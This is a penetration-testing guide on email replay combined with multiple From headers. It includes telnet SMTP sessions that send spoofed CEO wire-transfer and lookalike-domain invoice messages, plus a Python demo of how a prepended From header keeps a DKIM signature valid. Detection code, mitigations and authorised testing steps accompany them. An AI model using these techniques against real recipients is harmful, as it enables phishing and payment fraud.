SMTP Pentest Guide

Replay & Multiple From

This attack combines email replay with a second From header: a captured, DKIM-signed message is resent with an extra From header placed so that the signature still verifies, while the recipient's client may display the address the attacker added rather than the one the signature covers.

Attack Summary: Combining email replay techniques with multiple From headers to bypass authentication and create convincing spoofed emails.

Background: Email Replay and Multiple From

This attack combines two techniques we've discussed separately:

  • Email Replay: Capturing and resending legitimate emails with modifications
  • Multiple From Headers: Exploiting inconsistent handling of multiple From headers

By combining them, the attacker gets a message that carries a genuine dkim=pass for the original signer while the displayed sender is whichever From header the recipient's client happens to pick, a combination that both filters and users find hard to reason about.

Attack Methodology

This attack involves capturing legitimate emails, modifying them to include multiple From headers, and resending them to create convincing spoofed emails.

Basic Replay with Multiple From
Combining replay with multiple From headers

This variant involves capturing a legitimate email, adding multiple From headers, and resending it.

Replay with Multiple From Example

Replaying an email with multiple From headers

    # Capture a legitimate email with valid authentication
    # Insert a second From header above the original one, leaving the
    # signed headers and the body untouched
    # Resend it through a different server
    telnet mail.attacker.com 25
    HELO attacker.com
    MAIL FROM: original-sender@legitimate.com
    RCPT TO: victim@target.com
    DATA
    From: ceo@company.com
    Received: from mail.legitimate.com (mail.legitimate.com [192.0.2.1])
        by mail.recipient.com (Postfix) with ESMTPS for recipient@example.com;
        Mon, 20 Feb 2023 12:00:00 +0000
    DKIM-Signature: v=1; a=rsa-sha256; d=legitimate.com; s=selector; ...
    From: original-sender@legitimate.com
    To: victim@target.com
    Subject: Urgent Wire Transfer

    Please process this wire transfer immediately.
    .

Explanation: The attacker starts from a captured message that legitimate.com signed with DKIM. The signature's h= tag lists From once, and RFC 6376 makes a verifier take the physically last instance of each listed header, so a From header inserted above the original leaves the signed material, and therefore the signature, intact; a second From appended below the original would break it. The body has to be replayed byte for byte because bh= covers it. Clients disagree on which From to show: several display the first instance (ceo@company.com), others the last (original-sender@legitimate.com), and some show both or refuse the message. A recipient whose client shows the first From sees a message that claims to come from the CEO and, at the same time, carries a valid DKIM pass for legitimate.com. Two things defeat the variant: a receiver that follows RFC 7489 and rejects messages with more than one From header, and a signer that oversigns From (lists it twice in h=), which makes the inserted header invalidate the signature.

How It Works

  1. Attacker obtains a legitimate, DKIM-signed email (for example one the signing domain sent to an address the attacker controls)
  2. Attacker inserts a second From header above the original, leaving the signed headers and the body byte for byte intact
  3. Attacker resends the modified email through a server of their own (the envelope sender will typically fail SPF; only the DKIM verdict matters for this variant)
  4. DKIM still verifies: the verifier hashes the physically last instance of each header listed in h=, which is the original From, unless the signer oversigned From
  5. Email clients disagree on which of the two From headers to display
  6. Recipients whose client shows the inserted header see the email as coming from the address the attacker chose
  7. The message nevertheless carries a genuine dkim=pass, and a receiver that uses the last From header for DMARC alignment passes it while a client that shows the first From displays the spoofed address: the two checks look at different headers

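
The following is an added example, not code from the original guide, that walks through steps 2 and 4 above on a constructed message: it applies the RFC 6376 header-selection rule to show that a From header inserted above the original leaves the signed-header digest unchanged, that one appended below it (or any edit to the body) does not, and that oversigning From on the signing side closes the gap. The captured message, selector and tag values are invented; no key or real signature is involved, only the digest a verifier would compute over the covered headers.

```python
"""Added example, not from the original page: why a From header inserted
above the original survives DKIM verification while one appended below it
does not, and how oversigning stops it. Message and tag values are
constructed; no key or real signature is used, only the covered-header digest."""
import email
import hashlib
import re

# Constructed capture of a message legitimate.com signed. Assumption: the
# signer listed each covered header once in h=, the common weak default.
CAPTURED = (
    "DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=legitimate.com;\r\n"
    " s=selector; h=from:to:subject:date; bh=BODYHASH; b=SIGNATURE\r\n"
    "From: Original Sender <original-sender@legitimate.com>\r\n"
    "To: victim@target.com\r\n"
    "Subject: Invoice\r\n"
    "Date: Mon, 20 Feb 2023 12:00:00 +0000\r\n"
    "\r\n"
    "Please process this wire transfer immediately.\r\n"
)
SPOOFED_FROM = "From: CEO <ceo@company.com>\r\n"   # attacker-chosen display value


def split_message(raw):
    """Return ([(name, value), ...], body); folded lines stay inside value."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = []
    for line in head.split("\r\n"):
        if line[:1] in (" ", "\t") and headers:          # folded continuation
            headers[-1] = (headers[-1][0], headers[-1][1] + "\r\n" + line)
        else:
            name, _, value = line.partition(":")
            headers.append((name, value))
    return headers, body


def relaxed_header(name, value):
    """RFC 6376 relaxed header canonicalization."""
    value = re.sub(r"[ \t]*\r\n[ \t]+", " ", value)      # unfold
    value = re.sub(r"[ \t]+", " ", value).strip()
    return f"{name.lower().strip()}:{value}\r\n"


def select_signed_headers(headers, h_tag):
    """RFC 6376 section 5.4.2: walk h= left to right; each entry takes the
    physically LAST not-yet-used instance of that name, or nothing if none
    is left. This is the rule the attack depends on."""
    used, chosen = set(), []
    for wanted in h_tag.lower().split(":"):
        for idx in range(len(headers) - 1, -1, -1):
            if headers[idx][0].lower().strip() == wanted and idx not in used:
                used.add(idx)
                chosen.append(headers[idx])
                break
    return chosen


def signed_header_digest(raw):
    """SHA-256 over the canonicalized headers the signature covers. A real
    verifier also hashes the DKIM-Signature field itself (with b= emptied);
    header insertion does not touch that field, so it is omitted here."""
    headers, _ = split_message(raw)
    sig = next(v for n, v in headers if n.lower() == "dkim-signature")
    h_tag = re.search(r"\bh=([^;]+)", re.sub(r"\r\n[ \t]+", " ", sig)).group(1)
    material = "".join(relaxed_header(n, v)
                       for n, v in select_signed_headers(headers, h_tag.strip()))
    return hashlib.sha256(material.encode()).hexdigest()


def body_digest(raw):
    """Simple body canonicalization (trailing empty lines dropped). Any edit
    to the text changes this value, which is what bh= is compared against."""
    _, body = split_message(raw)
    return hashlib.sha256((body.rstrip("\r\n") + "\r\n").encode()).hexdigest()


def prepend_header(raw, line):
    return line + raw


def append_header(raw, line):
    head, sep, body = raw.partition("\r\n\r\n")
    return head + "\r\n" + line.rstrip("\r\n") + sep + body


def oversign(raw):
    """Signer-side fix: list From twice so any second instance is covered."""
    return raw.replace("h=from:to:subject:date", "h=from:from:to:subject:date", 1)


def displayed_from(raw):
    """What a parser that takes the first instance shows; Python's email
    module behaves like the clients that display the topmost From."""
    return email.message_from_string(raw)["From"]


def attack_outcomes():
    base = signed_header_digest(CAPTURED)
    base_over = signed_header_digest(oversign(CAPTURED))
    prepended = prepend_header(CAPTURED, SPOOFED_FROM)
    edited_body = CAPTURED.replace("immediately", "to the new account")
    return {
        "prepend_survives": signed_header_digest(prepended) == base,
        "append_survives": signed_header_digest(append_header(CAPTURED, SPOOFED_FROM)) == base,
        "prepend_survives_oversigned":
            signed_header_digest(prepend_header(oversign(CAPTURED), SPOOFED_FROM)) == base_over,
        "body_edit_survives": body_digest(edited_body) == body_digest(CAPTURED),
        "displayed_from_after_prepend": displayed_from(prepended),
    }


if __name__ == "__main__":
    for key, value in attack_outcomes().items():
        print(f"{key}: {value}")
```

Run stand-alone it prints the five outcomes; only the prepended header leaves the digest untouched, and Python's parser (like a first-instance client) reports the spoofed CEO address for that same message. The same construction is what step 2 of the Testing section below needs when building the modified message.
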
Selective Header Replay
Replaying only specific headers

This variant involves selectively replaying only specific headers from a legitimate email.

Selective Header Replay Example

Replaying only authentication headers

    # Capture a legitimate email with valid authentication
    # Keep only its Received, DKIM-Signature and Authentication-Results headers
    # Combine them with a new email body and multiple From headers
    # Resend it through a different server
    telnet mail.attacker.com 25
    HELO attacker.com
    MAIL FROM: original-sender@legitimate.com
    RCPT TO: victim@target.com
    DATA
    Received: from mail.legitimate.com (mail.legitimate.com [192.0.2.1])
        by mail.recipient.com (Postfix) with ESMTPS for recipient@example.com;
        Mon, 20 Feb 2023 12:00:00 +0000
    DKIM-Signature: v=1; a=rsa-sha256; d=legitimate.com; s=selector; ...
    Authentication-Results: mail.recipient.com; spf=pass; dkim=pass
    From: ceo@company.com
    From: finance@company.com
    To: victim@target.com
    Subject: Updated Wire Transfer Instructions

    Please use the following new wire transfer instructions...
    .

Explanation: The attacker captures a legitimate email and keeps only the headers that look like evidence of authentication (Received, DKIM-Signature, Authentication-Results), then pairs them with a new body and two From headers. Unlike the basic variant, this message cannot pass a real DKIM check: the body is new, so it no longer matches bh=, and neither From header is the one the signature covered. The replayed headers therefore only work against systems that trust what arrived with the message instead of verifying it: a mail client or downstream filter that reads the Authentication-Results line, or a receiver that fails to strip Authentication-Results fields bearing its own authserv-id (mail.recipient.com) at the border, as RFC 8601 requires. Received lines are unauthenticated trace text and prove nothing about the path. The two From headers then exploit the same client inconsistency as before.

Authentication Header Replay

Attackers can replay various authentication-related headers. None of them is self-validating; a receiver that verifies rather than trusts them will not be fooled, so what a replay really tests is whether any system in the delivery chain acts on headers that arrived with the message:

  • DKIM-Signature: verifies only if the covered headers and the body are unchanged; otherwise it is decoration that a non-verifying client may still present as "signed"
  • Authentication-Results: claims a pass at a previous hop; receivers must remove or ignore any instance bearing their own authserv-id that arrives from outside (RFC 8601)
  • Received: makes it appear that the email passed through legitimate servers; trace fields are free text that nobody signs
  • ARC-Authentication-Results: claims authentication at a previous hop; it means something only when the receiver validates the ARC-Seal signatures and trusts the sealer
  • Received-SPF: the field SPF verifiers add (RFC 7208); SPF is evaluated against the envelope by the receiving MTA itself, so a replayed line is irrelevant to it and only misleads systems that read headers

Time-Delayed Replay
Replaying emails after a time delay

This variant involves capturing legitimate emails and replaying them after a time delay with modifications.

Time-Delayed Replay Example

Replaying emails after a delay

    # Capture a legitimate email with valid authentication
    # Wait for a specific time or event
    # Modify it to include multiple From headers and updated content
    # Resend it through a different server
    # Example: a captured monthly invoice replayed with modified bank details
    telnet mail.attacker.com 25
    HELO attacker.com
    MAIL FROM: accounting@supplier.com
    RCPT TO: victim@customer.com
    DATA
    Received: from mail.supplier.com (mail.supplier.com [192.0.2.1])
        by mail.customer.com (Postfix) with ESMTPS for victim@customer.com;
        Mon, 20 Feb 2023 12:00:00 +0000
    DKIM-Signature: v=1; a=rsa-sha256; d=supplier.com; s=selector; ...
    From: accounting@supplier.com
    From: accounting@supp1ier.com
    To: victim@customer.com
    Subject: Monthly Invoice - March 2023

    Please process the attached invoice using the updated bank details below...
    .

Explanation: The attacker captures a real monthly invoice from the supplier, waits until the next one is due, and resends it just before the legitimate invoice would arrive, with a second From header on a lookalike domain (supp1ier.com, digit one for the letter l) and replaced bank details. Timing does the persuading: the recipient expects exactly this message at this moment. Two caveats apply. Because the body was edited, the replayed DKIM-Signature no longer matches bh= and a verifying receiver reports dkim=fail, so the signature only impresses systems and people that do not verify; with DMARC enforced for supplier.com the message is rejected or quarantined unless the receiver aligns against the lookalike From, which is exactly the inconsistent behaviour the attack probes. The signature's age, on the other hand, is not a defence: DKIM signatures expire only if the signer set an x= tag, which most do not, so an unmodified invoice captured months earlier still verifies when replayed.

Timing-Based Attacks

Attackers can use timing to make replay attacks more effective:

  • Expected communications: Replaying emails when similar legitimate emails are expected
  • Business events: Timing attacks around known business events (e.g., end of quarter)
  • Out-of-office periods: Targeting recipients when key personnel are away
  • High-volume periods: Replaying during times when recipients receive many emails
  • After-hours: Replaying emails outside normal business hours when scrutiny may be lower

Impact

This attack allows attackers to:

  • Deliver a message that carries a genuine dkim=pass for a third-party domain while the client shows a sender of the attacker's choosing
  • Exploit inconsistent client and filter behaviour to control which From header is displayed and which one is used for DMARC alignment
  • Get past filters and users that trust arrived headers or "authenticated" indicators instead of re-verifying
  • Conduct convincing phishing or business email compromise, for example invoice and wire-transfer fraud
  • Target specific recipients with customized attacks timed to communications they already expect

Detection

Organizations can detect these attacks by:

  • Counting From headers at the MTA and rejecting or quarantining any message with more than one; RFC 5322 allows exactly one, and RFC 7489 tells DMARC receivers to reject such messages or treat them as failing
  • Verifying DKIM, SPF and DMARC themselves on every inbound message instead of honouring Authentication-Results, Received-SPF or ARC headers that arrived with it, and removing Authentication-Results fields that carry their own authserv-id at the border
  • Checking alignment: a dkim=pass for legitimate.com on a message displayed as coming from company.com is the fingerprint of this attack
  • Remembering recent DKIM signature values (d=, s=, b=) and flagging a signature seen before, especially when it now arrives for a different recipient or with a different displayed sender
  • Comparing sender domains against known partner domains and flagging lookalikes such as supp1ier.com
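
The following is an added example, not code from the original guide, that implements the checks listed above as a receiver-side inspection and applies the reject-on-multiple-From policy from the Mitigation section. It runs over three constructed messages: a genuine invoice, the selective-replay message from earlier in the page, and the same invoice signature resent later with a lookalike From added. The authserv-id mail.recipient.com, the partner allow-list, the replay window and the confusable-character map are assumptions for the illustration; the code inspects structure only and assumes the MTA performs the cryptographic DKIM verification separately.

```python
"""Added example, not from the original page: receiver-side checks for the
replay and multiple-From patterns discussed above, over constructed messages.
Assumptions: this receiver's authserv-id is mail.recipient.com, the MTA
verifies DKIM cryptographically elsewhere, and the partner list is illustrative."""
import email
import email.utils
import re

OUR_AUTHSERV_ID = "mail.recipient.com"                       # assumed receiver identity
KNOWN_PARTNERS = {"supplier.com", "legitimate.com"}          # assumed allow-list
REPLAY_WINDOW = 7 * 24 * 3600                                # seconds a signature is remembered
CONFUSABLES = str.maketrans({"1": "l", "0": "o", "5": "s"})  # toy homoglyph map


class ReplayCache:
    """Remembers DKIM (d=, s=, b=) triples so a resent signed message stands out."""
    def __init__(self):
        self.seen = {}

    def is_replay(self, key, now):
        if key in self.seen and now - self.seen[key] <= REPLAY_WINDOW:
            return True
        self.seen[key] = now
        return False


def dkim_tags(value):
    """Parse 'k=v; k=v' into a dict; folding whitespace carries no meaning."""
    compact = re.sub(r"\s+", "", value)
    return dict(t.split("=", 1) for t in compact.split(";") if "=" in t)


def from_domains(msg):
    return [email.utils.parseaddr(v)[1].rpartition("@")[2].lower()
            for v in msg.get_all("From", [])]


def aligned(from_domain, d):
    """DMARC relaxed alignment, simplified to 'same domain or subdomain'."""
    return from_domain == d or from_domain.endswith("." + d) or d.endswith("." + from_domain)


def inspect(raw, cache, now):
    """Return the list of findings for one inbound message."""
    msg = email.message_from_string(raw)
    findings = []
    froms = from_domains(msg)
    if len(froms) != 1:                                      # RFC 5322 allows exactly one From
        findings.append(f"multiple_from:{len(froms)}")
    for ar in msg.get_all("Authentication-Results", []):
        # Nothing inbound may carry our own authserv-id; RFC 8601 says such
        # fields are removed at the border, so one that is present was forged.
        authserv = (ar.split(";")[0].split() or [""])[0].lower()
        if authserv == OUR_AUTHSERV_ID:
            findings.append("forged_authentication_results")
    for sig in msg.get_all("DKIM-Signature", []):
        tags = dkim_tags(sig)
        d = tags.get("d", "").lower()
        if not any(aligned(f, d) for f in froms):
            findings.append(f"dkim_unaligned:{d}")          # a pass would not satisfy DMARC
        if cache.is_replay((d, tags.get("s"), tags.get("b")), now):
            findings.append("dkim_replay")
    for f in froms:
        if f not in KNOWN_PARTNERS and f.translate(CONFUSABLES) in KNOWN_PARTNERS:
            findings.append(f"lookalike_domain:{f}")
    return findings


def verdict(findings):
    """Policy: structural forgeries are rejected outright, the rest held for review."""
    if any(f.startswith(("multiple_from", "forged_authentication")) for f in findings):
        return "reject"
    return "quarantine" if findings else "accept"


# Constructed inbound messages (signature values are placeholders).
SAMPLES = [
    ("genuine_invoice",
     "DKIM-Signature: v=1; a=rsa-sha256; d=supplier.com; s=sel; h=from:to; bh=AAA=; b=SIG1\r\n"
     "From: accounting@supplier.com\r\nTo: victim@customer.com\r\nSubject: Invoice\r\n\r\n"
     "Invoice attached.\r\n"),
    ("selective_replay",
     "Authentication-Results: mail.recipient.com; spf=pass; dkim=pass\r\n"
     "DKIM-Signature: v=1; a=rsa-sha256; d=legitimate.com; s=selector; h=from:to; bh=BBB=; b=SIG2\r\n"
     "From: ceo@company.com\r\nFrom: finance@company.com\r\nTo: victim@target.com\r\n\r\n"
     "Please use the new wire instructions.\r\n"),
    ("delayed_replay_lookalike",
     "DKIM-Signature: v=1; a=rsa-sha256; d=supplier.com; s=sel; h=from:to; bh=AAA=; b=SIG1\r\n"
     "From: accounting@supplier.com\r\nFrom: accounting@supp1ier.com\r\nTo: victim@customer.com\r\n\r\n"
     "Please use the updated bank details.\r\n"),
]


def run_samples(start=1_700_000_000):
    """Feed the samples through one cache a minute apart: name -> (findings, verdict)."""
    cache = ReplayCache()
    out = {}
    for i, (name, raw) in enumerate(SAMPLES):
        findings = inspect(raw, cache, start + 60 * i)
        out[name] = (findings, verdict(findings))
    return out


if __name__ == "__main__":
    for name, (findings, decision) in run_samples().items():
        print(f"{name}: {decision} {findings}")
```

The genuine invoice is accepted; the selective replay is rejected for carrying two From headers, a forged Authentication-Results line and a DKIM d= that aligns with neither From; the delayed replay is rejected for the duplicate From, and the cache additionally recognises that SIG1 was already seen and that supp1ier.com collapses to a known partner domain. In a real deployment the cache would live in a shared store with expiry rather than in a process-local dict.
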

Mitigation

To protect against these attacks, organizations should:

  • Reject multiple From headers: configure the MTA or filtering layer to reject messages with more than one From header rather than silently picking one (RFC 5322 permits exactly one; RFC 7489 expects DMARC receivers to reject or fail such messages)
  • Oversign as a sender: list From, and other displayed headers such as To, Subject, Date and Reply-To, twice in the DKIM h= tag so that an inserted instance invalidates the signature, as RFC 6376 recommends against header addition
  • Enforce DMARC: deploy SPF, DKIM and DMARC for all domains, publish p=reject, and evaluate DMARC on receipt
  • Trust only your own verification: strip foreign Authentication-Results at the border and have clients and filters rely on the verdict the receiving MTA adds, never on headers that arrived with the message
  • Train users: educate users that a "signed" or "authenticated" indicator is only as good as the system that produced it, and about lookalike domains
  • Implement additional verification: use out-of-band verification for payment and bank-detail changes and other sensitive requests
  • Monitor for anomalies: alert on duplicate DKIM signatures and on sender addresses that differ between the envelope, the signed From and the displayed From

Testing

Security professionals can test for this vulnerability using the following approach, against domains and mailboxes they control or are authorised to target:

  1. Capture legitimate emails with valid DKIM signatures (for example by having the signing domain send to a mailbox you control)
  2. Insert a second From header above the original, keeping the signed headers and the body unchanged
  3. Resend them from a different server to the test mailboxes
  4. Record which From header each email client displays, and whether any client shows both or warns
  5. Record the verdict the receiving MTA writes into its own Authentication-Results header (spf, dkim, dmarc) and whether a replayed Authentication-Results line survived the border
  6. Document every case where the displayed sender, the DKIM d= domain and the DMARC alignment decision disagree
